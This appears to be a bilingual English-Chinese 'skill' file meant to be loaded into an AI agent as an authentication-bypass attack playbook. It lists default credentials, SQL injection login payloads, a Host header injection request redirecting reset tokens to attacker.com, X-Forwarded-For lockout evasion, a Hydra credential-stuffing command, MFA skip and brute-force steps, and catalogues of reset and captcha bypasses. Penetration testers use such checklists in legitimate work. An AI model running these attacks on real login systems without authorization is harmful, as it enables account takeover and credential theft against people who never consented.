authbypass-authentication-flaws

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Authentication Bypass — Expert Attack Playbook

SKILL: 认证绕过 —— 专家级攻击手册

AI LOAD INSTRUCTION: Expert authentication bypass techniques. Covers SQL injection-based login bypass, password reset flaws, token predictability, account enumeration, brute force bypass, and multi-factor auth bypass. Distinct from JWT/OAuth (covered in ../jwt-oauth-token-attacks/SKILL.md). Focus on the login mechanism itself.

AI加载说明：专家级认证绕过技术，涵盖基于SQL注入的登录绕过、密码重置漏洞、令牌可预测性、账户枚举、暴力破解绕过和多因素认证绕过。与JWT/OAuth相关内容（见../jwt-oauth-token-attacks/SKILL.md）分开，本手册重点关注登录机制本身。

0. AUTHORIZED CREDENTIAL TEST PLANNING

0. 授权凭证测试规划

在减少入口后，默认凭证、用户名变体、端口聚焦和字典规模选择并入这里统一处理。

Service-first tiny sets

服务优先小型字典集

Service Type	First Usernames	First Passwords
phpMyAdmin	`root` , `admin`	empty, `root` , `phpmyadmin` , `admin`
FTP	`ftp` , `admin` , `test`	empty, `ftp` , `admin` , `123456`
SSH	`root` , `admin` , service account names	`root` , `admin` , seasonal variants
MySQL	`root` , `mysql`	empty, `root` , `mysql`
Tomcat / Java admin	`tomcat` , `admin` , `manager`	`tomcat` , `admin` , `s3cret`
WebLogic	`weblogic` , `admin`	`weblogic` , `welcome1` , `admin`

服务类型	首选用户名	首选密码
phpMyAdmin	`root` , `admin`	空密码, `root` , `phpmyadmin` , `admin`
FTP	`ftp` , `admin` , `test`	空密码, `ftp` , `admin` , `123456`
SSH	`root` , `admin` , 服务账号名称	`root` , `admin` , 季节性变体
MySQL	`root` , `mysql`	空密码, `root` , `mysql`
Tomcat / Java管理后台	`tomcat` , `admin` , `manager`	`tomcat` , `admin` , `s3cret`
WebLogic	`weblogic` , `admin`	`weblogic` , `welcome1` , `admin`

Username classes

用户名分类

Class	Examples
Generic admins	`admin` , `administrator` , `root` , `test` , `guest`
Support / ops	`dev` , `ops` , `sysadmin` , `service` , `backup`
Name-based	`firstname` , `lastname` , `f.lastname` , `first.last`
Mail-derived	left side of corporate email formats
Product-based	`tomcat` , `weblogic` , `jenkins` , `gitlab`

分类	示例
通用管理员账号	`admin` , `administrator` , `root` , `test` , `guest`
支持/运维账号	`dev` , `ops` , `sysadmin` , `service` , `backup`
基于姓名的账号	`firstname` , `lastname` , `f.lastname` , `first.last`
邮箱衍生账号	企业邮箱格式@左侧的部分
基于产品的账号	`tomcat` , `weblogic` , `jenkins` , `gitlab`

Wordlist sizing and port focus

字典规模和端口聚焦

Scenario	Preferred Size	Why
Default admin panel	5 to 50 passwords	Defaults beat giant lists here
Internal service with known product	vendor-specific small set	Better signal than generic lists
Consumer login with weak controls	Top 20 or Top 100	Fast verification
Rate-limited login	tiny list + header/rotation strategy	Preserve attempts
Offline hash cracking	large dictionaries	Online brute rules do not apply

优先端口和服务面：80/443/8080/8443 管理面板，22 SSH，21 FTP，3306/5432/6379/27017 数据或管理服务。

场景	首选规模	原因
默认管理面板	5到50个密码	弱口令的优先级远大于大型字典
已知产品的内部服务	厂商专属小型字典	比通用字典的有效信号更强
防护较弱的C端登录	前20或前100常用密码	快速验证
有限流的登录接口	小型字典 + 头部/轮换策略	保留尝试次数
离线哈希破解	大型字典	不适用在线暴力破解规则

优先端口和服务面：80/443/8080/8443 管理面板，22 SSH，21 FTP，3306/5432/6379/27017 数据或管理服务。

1. SQL INJECTION LOGIN BYPASS

1. SQL注入登录绕过

Classic but still found in legacy systems, custom ORMs, and raw query code:

sql

-- Basic bypass (admin user assumed first row):
Username: admin'--
Password: anything
→ Query: SELECT * FROM users WHERE user='admin'--' AND pass='anything'

-- Generic bypass (logs in as first user in DB):
Username: ' OR '1'='1'--
Password: anything
→ Query: SELECT * FROM users WHERE user='' OR '1'='1'--' AND pass='anything'

-- Blind: does this work?
Username: ' OR 1=1--
Username: admin' OR 'a'='a
Username: 1' OR '1'='1'/*
Username: 1 or 1=1

Test each field separately — only one field may be vulnerable.

这类漏洞虽然经典，但仍存在于遗留系统、自定义ORM和原生查询代码中：

sql

-- 基础绕过（默认admin用户为查询结果第一行）:
用户名: admin'--
密码: 任意内容
→ 生成的查询语句: SELECT * FROM users WHERE user='admin'--' AND pass='anything'

-- 通用绕过（以数据库中第一个用户身份登录）:
用户名: ' OR '1'='1'--
密码: 任意内容
→ 生成的查询语句: SELECT * FROM users WHERE user='' OR '1'='1'--' AND pass='anything'

-- 盲注测试payload:
用户名: ' OR 1=1--
用户名: admin' OR 'a'='a
用户名: 1' OR '1'='1'/*
用户名: 1 or 1=1

逐个测试每个字段——可能只有单个字段存在漏洞。

2. PASSWORD RESET VULNERABILITIES

2. 密码重置漏洞

Guessable / Predictable Reset Tokens

可猜测/可预测的重置令牌

Check if reset token is based on:

- Timestamp: token=1691234567890 (Unix time)
- Sequential: token=1001, 1002, 1003
- MD5(email): echo -n "user@example.com" | md5sum
- MD5(username+timestamp): reversible
- Short token (4-6 digits): brute-forceable

Test: Request 3 consecutive reset emails, compare token patterns.

检查重置令牌是否基于以下规则生成：

- 时间戳: token=1691234567890 (Unix时间)
- 连续序列: token=1001, 1002, 1003
- MD5(邮箱): echo -n "user@example.com" | md5sum
- MD5(用户名+时间戳): 可反向破解
- 短令牌(4-6位数字): 可暴力破解

测试方法：连续申请3次重置邮件，对比令牌的规律。

Reset Token Not Expiring

重置令牌未过期

1. Request password reset → get token via email
2. Wait 48+ hours (token should expire)
3. Use old token → does it work?

1. 申请密码重置 → 通过邮件获取令牌
2. 等待48小时以上（令牌理论上应过期）
3. 使用旧令牌尝试重置 → 是否仍然有效？

Reset Token Reuse

重置令牌可重复使用

1. Request reset → get token T1
2. Complete reset with T1
3. Use T1 again → does it work again?

1. 申请重置 → 获取令牌T1
2. 使用T1完成密码重置
3. 再次使用T1尝试重置 → 是否仍然有效？

Host Header Injection in Reset Email

重置邮件中的Host头注入

When application generates reset URL using

Host

header:

http

POST /forgot-password HTTP/1.1
Host: attacker.com           ← inject attacker's domain
Content-Type: application/x-www-form-urlencoded

email=victim@target.com

→ Reset email sent to victim with link pointing to

attacker.com/reset?token=VICTIM_TOKEN

→ Victim clicks → token captured by attacker

Test: Send password reset with modified

Host:

, check email for where reset link points.

当应用使用

Host

头生成重置链接时：

http

POST /forgot-password HTTP/1.1
Host: attacker.com           ← 注入攻击者域名
Content-Type: application/x-www-form-urlencoded

email=victim@target.com

→ 发送给受害者的重置邮件中的链接指向

attacker.com/reset?token=VICTIM_TOKEN

→ 受害者点击链接后，令牌被攻击者捕获

测试方法：修改

Host

头后发送密码重置请求，检查邮件中的重置链接指向的域名。

Password Reset Token in Referer

Referer头泄露密码重置令牌

1. Request reset → go to reset URL with token
2. Reset page loads third-party resources (analytics, fonts)
→ Referer header leaks: https://target.com/reset?token=TOKEN
→ Third-party server receives token in logs

1. 申请重置 → 访问带令牌的重置URL
2. 重置页面加载第三方资源（分析工具、字体等）
→ Referer头会泄露完整地址：https://target.com/reset?token=TOKEN
→ 第三方服务的日志中会记录该令牌

Password Change Without Current Password

无需当前密码即可修改密码

PUT /api/user/password
{"new_password": "hacked"}
→ No current_password field required?
→ Combine with CSRF for account takeover

PUT /api/user/password
{"new_password": "hacked"}
→ 接口是否不需要校验current_password字段？
→ 结合CSRF漏洞可实现账户接管

3. ACCOUNT ENUMERATION

3. 账户枚举

Identifying valid usernames/emails enables targeted attacks:

识别有效的用户名/邮箱可以为定向攻击提供基础：

Error Message Difference

错误信息差异

Invalid username → "User not found"
Valid username, wrong pass → "Incorrect password"
→ Enumerate valid accounts

无效用户名 → 返回"用户不存在"
有效用户名+错误密码 → 返回"密码不正确"
→ 可枚举有效账户

Response Time Difference

响应时间差异

Invalid username → fast response (no DB lookup)
Valid username → slightly slower (DB lookup + hash comparison)
→ Timing oracle

无效用户名 → 响应更快（无需查询数据库）
有效用户名 → 响应稍慢（需要查询数据库+哈希对比）
→ 时间侧信道漏洞

Password Reset Flow

密码重置流程差异

POST /forgot-password {"email": "nonexistent@example.com"}
→ "If this email exists, we sent a reset link" (proper)
vs.
→ "This email is not registered" (enumeration possible)

POST /forgot-password {"email": "nonexistent@example.com"}
→ 安全实现："如果该邮箱已注册，我们已发送重置链接"（无差异）
vs.
→ 存在风险："该邮箱未注册"（可进行枚举）

Registration Endpoint

注册接口差异

POST /register {"email": "victim@example.com"}
→ "Email already registered" → confirms account exists
vs.
→ "Verification email sent" for both → no enumeration

POST /register {"email": "victim@example.com"}
→ 返回"该邮箱已注册" → 确认账户存在
vs.
→ 无论是否注册都返回"验证邮件已发送" → 无法枚举

4. BRUTE FORCE BYPASS

4. 暴力破解绕过

Lockout After N Attempts Then Resets

N次尝试后锁定但会自动重置

Lockout at 10 attempts → try 9 wrong passwords → lock
Wait for reset period (usually 30 min or 1 hour)
→ Try 9 more → repeat → no permanent lockout

10次尝试后锁定 → 尝试9次错误密码后等待
等待锁定重置周期（通常为30分钟或1小时）
→ 再尝试9次 → 重复操作 → 不会被永久锁定

IP-Based Lockout Bypass

IP锁定绕过

X-Forwarded-For: 1.1.1.1       ← change each request
X-Real-IP: 2.2.2.2
Rotate through IPs in header

X-Forwarded-For: 1.1.1.1       ← 每次请求修改该值
X-Real-IP: 2.2.2.2
轮流替换请求头中的IP地址

Username Cycling vs Password Cycling

用户名轮换 vs 密码轮换

Normal brute: try many passwords for one user → lock
Reverse brute: try ONE password for many users
→ "password123" against all users → find those with weak password
→ No single account locked out

普通暴力破解：对单个用户尝试大量密码 → 容易触发锁定
反向暴力破解：对大量用户尝试同一个常用密码
→ 用"password123"遍历所有用户 → 找到使用弱密码的用户
→ 不会触发单个账户的锁定机制

Credential Stuffing

凭证撞库

Use breached credentials from HaveIBeenPwned datasets against target:

bash

undefined

使用HaveIBeenPwned等数据集的泄露凭证针对目标进行测试：

bash

undefined

Tools: Hydra, Burp Intruder, custom scripts

工具：Hydra, Burp Intruder, 自定义脚本

hydra -C credentials.txt https-post-form://target.com/login:"username=^USER^&password=^PASS^":"error message"

---

hydra -C credentials.txt https-post-form://target.com/login:"username=^USER^&password=^PASS^":"error message"

---

5. MULTI-FACTOR AUTHENTICATION BYPASS

5. 多因素认证(MFA)绕过

Session Cookie Before 2FA Completion

2FA验证完成前已生成会话Cookie

Flow: Login (password correct) → redirect to 2FA page → enter code
Attack: After password step, session cookie is set but 2FA not yet checked.
→ Use session cookie to directly access /dashboard
→ Skip 2FA page entirely

正常流程：登录（密码正确）→ 跳转到2FA页面 → 输入验证码
攻击方式：密码验证通过后，系统已设置会话Cookie，但还未校验2FA
→ 直接使用该会话Cookie访问/dashboard等后台页面
→ 完全跳过2FA验证步骤

2FA Code Brute Force

2FA验证码暴力破解

4-6 digit TOTP codes = 1,000,000 possibilities max
If no lockout on 2FA step:
→ Brute force all codes (tool: Burp Intruder, sequential)
→ TOTP windows: 30-second window, some accept previous/next window

4-6位TOTP验证码最多只有100万种可能
如果2FA步骤没有锁定机制：
→ 暴力遍历所有验证码（工具：Burp Intruder，按顺序尝试）
→ TOTP有效期为30秒，部分系统会接受前后一个窗口的验证码

2FA on Critical Actions Not On Login

仅登录要求2FA，关键操作无校验

Login doesn't require 2FA, but:
DELETE /account or POST /transfer requires 2FA
Attack: Is 2FA checked on those actions or only on login?
→ If only login: log in once → no 2FA needing verification for actions

登录不需要2FA，但：
DELETE /account 或 POST /transfer 等关键操作要求2FA
攻击点：关键操作是否真的校验2FA，还是仅在登录时校验？
→ 如果仅登录校验：登录一次后，后续所有操作都不需要再验证2FA

2FA Backup Code Abuse

2FA备用码滥用

Generate backup codes (usually 8-10 single-use)
Test: 
→ Are backup codes rate-limited?
→ Can backup codes be used multiple times?
→ Short codes (6-8 chars)? Brute-force if no rate limit

系统生成的备用码通常为8-10个一次性验证码
测试点：
→ 备用码是否有限流机制？
→ 备用码是否可以多次使用？
→ 备用码是否为短字符(6-8位)？如果没有限流可暴力破解

2FA Code Reuse

2FA验证码可重复使用

TOTP codes valid for one use
→ Use same TOTP code twice → does second use work?
→ Replay attack if server doesn't track used codes

TOTP验证码理论上只能使用一次
→ 同一个TOTP验证码尝试两次 → 第二次是否有效？
→ 如果服务端没有记录已使用的验证码，可进行重放攻击

6. OAUTH / SSO ACCOUNT TAKEOVER PATTERNS

6. OAuth / SSO账户接管模式

Email Claim Trust

邮箱声明信任漏洞

1. Create account at attacker-controlled OAuth provider
2. Set email claim = victim@target.com
3. Link/login via that provider
→ If server trusts email claim without verification → account merge/takeover

1. 在攻击者控制的OAuth提供商处创建账户
2. 将邮箱声明设置为victim@target.com
3. 通过该提供商关联/登录目标系统
→ 如果服务端未校验就信任邮箱声明 → 会直接合并/接管受害者账户

Password Doesn't Apply After SSO Link

SSO关联后密码规则失效

1. User links Google SSO
2. User forgets password (account has no password set after SSO only)
3. "Forgot Password" flow → resets password even for SSO-only accounts?  
→ Can set password → now bypass SSO → direct login

1. 用户绑定了Google SSO登录
2. 用户忘记密码（仅SSO登录的账户可能未设置密码）
3. 通过“忘记密码”流程 → 是否可以为仅SSO登录的账户重置密码？
→ 成功设置密码后可绕过SSO直接登录账户

7. USERNAME / PASSWORD FIELD MANIPULATION

7. 用户名/密码字段操控

Long Password DoS → Bypass

长密码DoS/绕过

Some apps hash passwords before sending to database.
bcrypt has 72-byte limit — input beyond 72 bytes is ignored.
Attack: 
→ Register with password "A"*100
→ Login with password "A"*72 → same hash → works
→ Login with "A"*71 + "totally different" → if truncation → same hash if first 72 chars match

部分应用会在发送到数据库前对密码进行哈希处理
bcrypt有72字节的长度限制 —— 超过72字节的部分会被忽略
攻击方式：
→ 注册时使用密码"A"*100
→ 登录时使用"A"*72 → 哈希值相同 → 登录成功
→ 登录时使用"A"*71 + "totally different" → 如果存在截断，只要前72位相同哈希值就一致

Null Byte in Username

用户名中的空字节

username=admin%00 vs username=admin
→ Null byte truncation in some string comparisons
→ "admin\0attacker" = "admin" in C-string comparison

username=admin%00 和 username=admin
→ 部分字符串比较逻辑会被空字节截断
→ C语言字符串比较中"admin\0attacker" = "admin"

Unicode Normalization

Unicode归一化漏洞

Username: "ⓢcott" → normalizes to "scott" → impersonates "scott"
Username: "admin" (various Unicode homoglyphs for letters a,d,m,i,n)

用户名："ⓢcott" → 归一化后为"scott" → 可冒充用户"scott"
用户名：使用a、d、m、i、n对应的各种Unicode同形异义字构造"admin"

8. SESSION MANAGEMENT FLAWS

8. 会话管理漏洞

Session Not Invalidated on Logout

登出后会话未失效

1. Log in → capture session cookie
2. Log out
3. Replay captured session cookie → still valid?
→ Session not server-side invalidated

1. 登录 → 捕获会话Cookie
2. 正常登出
3. 重放捕获的会话Cookie → 是否仍然有效？
→ 说明服务端未对会话进行失效处理

Session Not Regenerated on Privilege Change

权限变更后会话未重新生成

1. Log in as low priv → get session cookie
2. Admin upgrades your role
3. Old session cookie now has admin access?
→ Session not regenerated → old token inherits new privileges

1. 以低权限身份登录 → 获取会话Cookie
2. 管理员为你的账号升级权限
3. 旧的会话Cookie是否已经拥有管理员权限？
→ 会话未重新生成 → 旧令牌会继承新的权限

Predictable Session Tokens

可预测的会话令牌

Token: base64(userid+timestamp) → reversible
Token: sequential integers → session ID= your_session_id -/+ small number
Token: short random (32-bit entropy) → brute-forceable

令牌：base64(用户ID+时间戳) → 可反向解密
令牌：连续整数 → 会话ID=你的会话ID±小数字即可遍历
令牌：短随机值(32位熵) → 可暴力破解

9. AUTHENTICATION TESTING CHECKLIST

9. 认证测试 Checklist

□ Try SQL injection on login fields (' OR 1=1--)
□ Test password reset: predict token, host header injection, Referer leak
□ Test account enumeration via error messages / timing
□ Check 2FA: skip step (direct URL), brute force codes, reuse codes
□ Test brute force protections: X-Forwarded-For bypass, reverse brute
□ Check session invalidation on logout
□ Check session regeneration after privilege change
□ Test password change requiring current password  
□ Test long passwords (bcrypt 72-byte truncation)
□ OAuth/SSO: test email claim trust, password set after SSO
□ Check remember_me tokens: how long, revocable, predictable?

□ 在登录字段尝试SQL注入 (' OR 1=1--)
□ 测试密码重置：令牌预测、Host头注入、Referer泄露
□ 通过错误信息/响应时间测试账户枚举风险
□ 检查2FA：直接访问后台跳过步骤、暴力破解验证码、验证码复用
□ 测试暴力破解防护：X-Forwarded-For绕过、反向暴力破解
□ 检查登出后会话是否失效
□ 检查权限变更后会话是否重新生成
□ 测试修改密码是否需要校验当前密码
□ 测试长密码场景（bcrypt 72字节截断漏洞）
□ OAuth/SSO：测试邮箱声明信任、SSO绑定后的密码设置漏洞
□ 检查remember_me令牌：有效期、是否可撤销、是否可预测

10. PASSWORD RESET ATTACK MATRIX (22 Patterns)

10. 密码重置攻击矩阵（22种模式）

#	Pattern	Description
1	Predictable reset token	Token based on timestamp, user ID, or sequential number
2	Token not bound to user	Use token generated for user A to reset user B
3	Token in response body	Reset token returned in HTTP response (not just email)
4	Token in URL parameter	Reset link token visible in Referer header to external resources
5	No token expiration	Token remains valid indefinitely
6	Token reuse	Same token works multiple times
7	Short/brute-forceable token	4-6 digit numeric code without rate limiting
8	Password reset via host header	`Host: attacker.com` → reset link sent with attacker's domain
9	Registration overwrites existing account	Register with same email → overwrites password
10	Step skip (frontend only)	Jump directly to "set new password" step via URL
11	Response manipulation	Change `{"status":"fail"}` to `{"status":"success"}` in proxy
12	Verification code in response	SMS/email code returned in API response
13	Parallel session reset	Start reset for A, complete with B's session
14	Email/phone parameter pollution	`email=victim@x.com&email=attacker@x.com`
15	Unicode normalization	`admin@target.com` vs `ADMIN@target.com` vs Unicode confusables
16	SQL injection in reset	Email field injectable in reset query
17	IDOR on reset endpoint	Change user ID in reset confirmation request
18	Cross-protocol reset	Mobile API doesn't validate same token as web
19	Default security questions	Guessable answers, no rate limit
20	Token generation race condition	Multiple simultaneous requests generate same token
21	Logout doesn't invalidate reset	After password change, old sessions still work
22	Reset link cached by CDN/proxy	Public cache stores reset link with token

#	模式	描述
1	可预测的重置令牌	令牌基于时间戳、用户ID或连续序列生成
2	令牌未与用户绑定	使用为用户A生成的令牌可以重置用户B的密码
3	令牌返回在响应体中	重置令牌直接返回在HTTP响应中（不仅是邮件）
4	令牌在URL参数中	重置链接的令牌会通过Referer头泄露给外部资源
5	令牌无过期机制	令牌永久有效
6	令牌可复用	同一个令牌可以多次使用
7	短/可暴力破解的令牌	4-6位数字验证码且无速率限制
8	密码重置Host头注入	`Host: attacker.com` → 重置链接指向攻击者域名
9	注册覆盖已有账户	使用已存在的邮箱注册 → 直接覆盖原有密码
10	前端步骤跳过	直接通过URL访问“设置新密码”步骤
11	响应篡改	在代理中将 `{"status":"fail"}` 修改为 `{"status":"success"}`
12	验证码返回在响应中	SMS/邮箱验证码直接返回在API响应中
13	并行会话重置	为用户A发起重置流程，用用户B的会话完成重置
14	邮箱/手机号参数污染	`email=victim@x.com&email=attacker@x.com`
15	Unicode归一化漏洞	`admin@target.com` vs `ADMIN@target.com` vs Unicode混淆字符
16	重置接口SQL注入	密码重置的邮箱字段存在注入漏洞
17	重置接口IDOR漏洞	修改重置确认请求中的用户ID
18	跨协议重置漏洞	移动端API和Web端的令牌校验规则不一致
19	默认密保问题	密保问题答案可猜测，无速率限制
20	令牌生成竞态条件	多个同时请求生成相同的令牌
21	登出未失效重置会话	修改密码后，旧的会话仍然有效
22	重置链接被CDN/代理缓存	公共缓存存储了带令牌的重置链接

11. CAPTCHA/VERIFICATION BYPASS PATTERNS (20 Methods)

11. 验证码/验证绕过模式（20种方法）

#	Method	How
1	Remove captcha parameter	Delete captcha field from request
2	Send empty captcha	`captcha=` or `captcha=null`
3	Reuse previous captcha	Same captcha value works multiple times
4	Captcha not bound to session	Use captcha solved in session A for session B
5	Server-side validation missing	Captcha checked client-side only
6	Response manipulation	Intercept and change response to bypass
7	Change request method	POST→GET or vice versa may skip captcha check
8	JSON content-type	Switch from form to JSON — captcha handler may not process
9	OCR bypass	Simple captchas solvable with tesseract/ML
10	Audio captcha weakness	Audio often simpler than visual
11	SMS code in response	Verification code returned in API response body
12	SMS code predictable	Sequential or time-based codes
13	No rate limit on code verification	Brute-force 4-6 digit code
14	Code not bound to phone/email	Use code sent to phone A on account B
15	Code doesn't expire	Old codes remain valid
16	Null byte in phone number	`+1234567890%00` bypasses dedup but delivers to same number
17	Case sensitivity	Email: `Admin@X.com` vs `admin@x.com`
18	Space/encoding in identifier	`user@x.com` vs `user@x.com` (trailing space)
19	Concurrent requests	Race condition: send verify before captcha loads
20	Third-party captcha bypass	Misconfigured reCAPTCHA site key allows any domain

#	方法	实现方式
1	移除验证码参数	从请求中删除验证码字段
2	发送空验证码	`captcha=` 或 `captcha=null`
3	复用之前的验证码	同一个验证码值可以多次使用
4	验证码未与会话绑定	会话A中破解的验证码可以在会话B中使用
5	缺失服务端校验	验证码仅在客户端校验
6	响应篡改	拦截并修改响应绕过验证
7	修改请求方法	POST改GET或反过来可能跳过验证码校验
8	JSON内容类型切换	从表单格式切换为JSON格式 —— 验证码处理逻辑可能不生效
9	OCR绕过	简单验证码可以用tesseract/ML识别
10	音频验证码弱点	音频验证码通常比视觉验证码更容易破解
11	SMS验证码返回在响应中	验证码直接返回在API响应体中
12	SMS验证码可预测	验证码为连续序列或基于时间生成
13	验证码校验无速率限制	可暴力破解4-6位数字验证码
14	验证码未与手机号/邮箱绑定	发送给手机号A的验证码可以用于账户B
15	验证码无过期机制	旧的验证码仍然有效
16	手机号中的空字节	`+1234567890%00` 绕过去重但仍然发送到同一个号码
17	大小写敏感问题	邮箱： `Admin@X.com` vs `admin@x.com`
18	标识符中的空格/编码问题	`user@x.com` vs `user@x.com` （末尾空格）
19	并发请求	竞态条件：在验证码加载前发送验证请求
20	第三方验证码绕过	reCAPTCHA站点密钥配置错误，允许任意域名调用

12. INSECURE RANDOMNESS — TOKEN PREDICTION

12. 不安全随机数 —— 令牌预测

UUID v1 (Time-Based — Predictable!)

UUID v1（基于时间 —— 可预测！）

UUID v1 format: timestamp-clock_seq-node(MAC)

UUID v1格式：timestamp-clock_seq-node(MAC)

MAC address often leaked via other endpoints

MAC地址通常可以通过其他接口泄露

Timestamp is 100ns intervals since 1582-10-15

时间戳为1582-10-15以来的100纳秒间隔数

Tool: guidtool (reconstruct possible UUIDs from known timestamp range)

工具：guidtool（根据已知时间范围重建可能的UUID）

undefined

undefined

MongoDB ObjectId

ObjectId = 4-byte timestamp + 5-byte random + 3-byte counter

ObjectId = 4字节时间戳 + 5字节随机数 + 3字节计数器

First 4 bytes = Unix timestamp → creation time leaked

前4字节 = Unix时间戳 → 泄露创建时间

Counter is sequential → adjacent ObjectIds predictable

计数器是连续的 → 相邻的ObjectId可预测

If you know one ObjectId, nearby ones are calculable

只要知道一个ObjectId，就可以计算出附近的ObjectId

undefined

undefined

PHP uniqid()

php

uniqid() = hex(microtime)
// Output: 5f3e7a4c1d2b3
// Entirely based on current microsecond timestamp
// Predictable if you know approximate server time

php

uniqid() = hex(microtime)
// 输出：5f3e7a4c1d2b3
// 完全基于当前微秒时间戳生成
// 只要知道大概的服务器时间就可以预测

PHP mt_rand() Recovery

PHP mt_rand() 种子恢复

undefined

undefined

mt_rand() uses Mersenne Twister PRNG

mt_rand()使用Mersenne Twister PRNG算法

After observing ~624 outputs, full internal state is recoverable

观察约624个输出后，可以恢复完整的内部状态

Tool: openwall/php_mt_seed

工具：openwall/php_mt_seed

Feed known outputs → recover seed → predict all future values

输入已知的输出 → 恢复种子 → 预测所有未来的生成值

undefined

undefined

Tools

工具

```
guidtool
```
— UUID v1 reconstruction
```
AethliosIK/reset-tolkien
```
— Automated token prediction for password resets
```
openwall/php_mt_seed
```
— PHP mt_rand seed recovery
```
sandwich
```
— Token timestamp analysis

```
guidtool
```
—— UUID v1重建
```
AethliosIK/reset-tolkien
```
—— 密码重置令牌自动预测
```
openwall/php_mt_seed
```
—— PHP mt_rand种子恢复
```
sandwich
```
—— 令牌时间戳分析